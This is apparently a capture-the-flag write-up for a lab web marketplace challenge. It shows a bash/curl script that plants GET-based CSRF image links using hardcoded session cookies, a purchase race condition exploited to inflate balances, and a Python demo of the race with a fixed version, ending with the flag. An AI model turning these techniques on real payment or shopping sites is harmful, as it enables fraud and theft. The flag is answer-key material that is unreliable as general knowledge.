Tags: http web 

Rating:

Description:

    Mr. Moneybags is taking a day off - but new users get $500 just for joining! I bet you could earn over $100,000 this way!
    server: http://172.31.1.55/

<h2>Exploration</h2>
Hitting the URL with a browser shows a simple web service with a registration link. Signup requires a username, a password, and a simple CAPTCHA.

After logging in, we were immediately redirected to a page with a grid of items for sale; the listings had already been booby-trapped by other players, and merely loading them drained most of our starting $500. As we were clicking around, an additional exploit seemed to steal our cookies by making a request to another server on the network.

Creating a new account, we used the Chrome debugging tools to artificially throttle the network to GPRS speeds, which allowed us to intercept the post-login redirect before the listings page loaded and kept our account (and starting cash) secure.

Using our compromised account, we created a new listing, which required a title, description, a URL for an image, and the desired price of the item. The help text for the image suggested using a data URL.

Once our listing was created, we attempted to buy another listing, noting that the request was made via GET instead of POST.

<h2>Exploitation and Automation</h2>
Creating a new listing, we used the URL from the "Buy" button on our first listing as the image `src`, which rendered as `<img src="/listings/12345?buy=1" />`, causing anyone viewing the listing to attempt to buy our first listing.

Looking at the `POST` message that was sent when submitting new listings, we noticed that only two pieces of identifying information were required: the `sessionid` cookie and the `csrftoken` (sent as a cookie and repeated in the `csrfmiddlewaretoken` form field).

Wrapping this up in a shell script, we ended up with:

    #!/bin/bash
    # Usage: ./relist.sh [cost]
    # Creates a listing whose image URL points at the "buy" link of the listing
    # created by the previous run (whose response was captured in last.txt).

    # Pull the listing id out of the Location header that curl -v wrote to last.txt
    last=$(grep 'Location: ' last.txt 2>/dev/null)
    last=${last%/*}      # drop the trailing slash
    last=${last##*/}     # keep only the final path component (the listing id)
    cost=100
    if [ -n "$1" ]; then
      cost="$1"
    fi

    # Session and CSRF cookies of our account, copied from the browser
    token=I61EoRXcJ7zzOPkrV5nC0MJu3h6xhTOj
    sessionid=u6jyb7uiu5s38r6squc2eyappinykq9c
    curl -v 'http://172.31.1.55/listings/new/' \
        -H "Cookie: sessionid=$sessionid; csrftoken=$token" \
        -H 'Content-Type: application/x-www-form-urlencoded' \
        -H 'Referer: http://172.31.1.55/listings/new/' \
        --data 'name=sup&details=buybuybuy&image_src=%2Flisting%2F'"$last"'%3Fbuy%3D1&cost='"$cost"'&csrfmiddlewaretoken='"$token" \
        &> last.txt   # capture headers (including the new Location) and body

    grep 'Location:' last.txt  # Show the link to the posting we just created

Running this in a bash loop created multiple new postings for $100 every second, flooding the board with our own listings.

Unfortunately, while we were getting some money using this strategy, we weren't getting very much.

Fortunately, we noticed a race condition when viewing many listings at once: the purchases were processed concurrently, so the balance check did not stop the buyer from ending up with a negative balance, while the seller was credited for every purchase and ended up with a significant balance.

By bouncing our money back and forth between our two accounts, combined with more and more expensive listings, we were able to end the game with a balance of over $100,000 on one account, and -$60,000 on the other account.
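To show why concurrent purchases let a buyer go negative, here is an added example (not the challenge's own code) using a toy in-memory ledger with two buy routines: the racy one checks the balance and then debits it as two separate steps, so every concurrent purchase passes the check before any of them pays, while the fixed one performs the check and the debit inside one critical section. The names `Ledger`, `buy_racy`, `buy_atomic` and `run_concurrent_buys` are made up for this example.

```python
import threading


class Ledger:
    """Toy marketplace ledger: one balance per account (constructed for this example)."""

    def __init__(self, balances):
        self.balances = dict(balances)
        self.lock = threading.Lock()

    def buy_racy(self, buyer, seller, price, barrier):
        # Vulnerable pattern: the balance check and the debit are separate steps.
        # Each write is itself atomic (like a single UPDATE), but nothing ties the
        # check to the write, so N concurrent purchases all pass the same check.
        if self.balances[buyer] >= price:   # time-of-check
            barrier.wait()                   # every buyer has passed the check before anyone pays
            with self.lock:                  # time-of-use
                self.balances[buyer] -= price
                self.balances[seller] += price
            return True
        return False

    def buy_atomic(self, buyer, seller, price, barrier):
        # Fixed pattern: check and debit happen under one lock (in SQL terms, a
        # conditional UPDATE ... WHERE balance >= price, or SELECT ... FOR UPDATE).
        barrier.wait()
        with self.lock:
            if self.balances[buyer] < price:
                return False
            self.balances[buyer] -= price
            self.balances[seller] += price
            return True


def run_concurrent_buys(method_name, buyer_start, price, n):
    """Fire n simultaneous purchases; return (buyer balance, seller balance, purchases that succeeded)."""
    ledger = Ledger({"buyer": buyer_start, "seller": 0})
    barrier = threading.Barrier(n)   # forces all n requests to overlap
    results = []                     # list.append is thread-safe in CPython
    method = getattr(ledger, method_name)
    threads = [threading.Thread(target=lambda: results.append(method("buyer", "seller", price, barrier)))
               for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return ledger.balances["buyer"], ledger.balances["seller"], sum(results)


if __name__ == "__main__":
    print("racy:  ", run_concurrent_buys("buy_racy", 500, 400, 5))    # buyer ends at -1500
    print("atomic:", run_concurrent_buys("buy_atomic", 500, 400, 5))  # only one purchase succeeds
```

With the $500 starting balance from the challenge and five overlapping $400 purchases, the racy ledger lets all five through and the buyer finishes at -$1500, which is exactly the negative-balance behaviour exploited above; the atomic version allows one.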

Once we had accumulated enough money, we were presented with the flag `red_herrings_are_tasty` at the top of the page.

Answer:

    red_herrings_are_tasty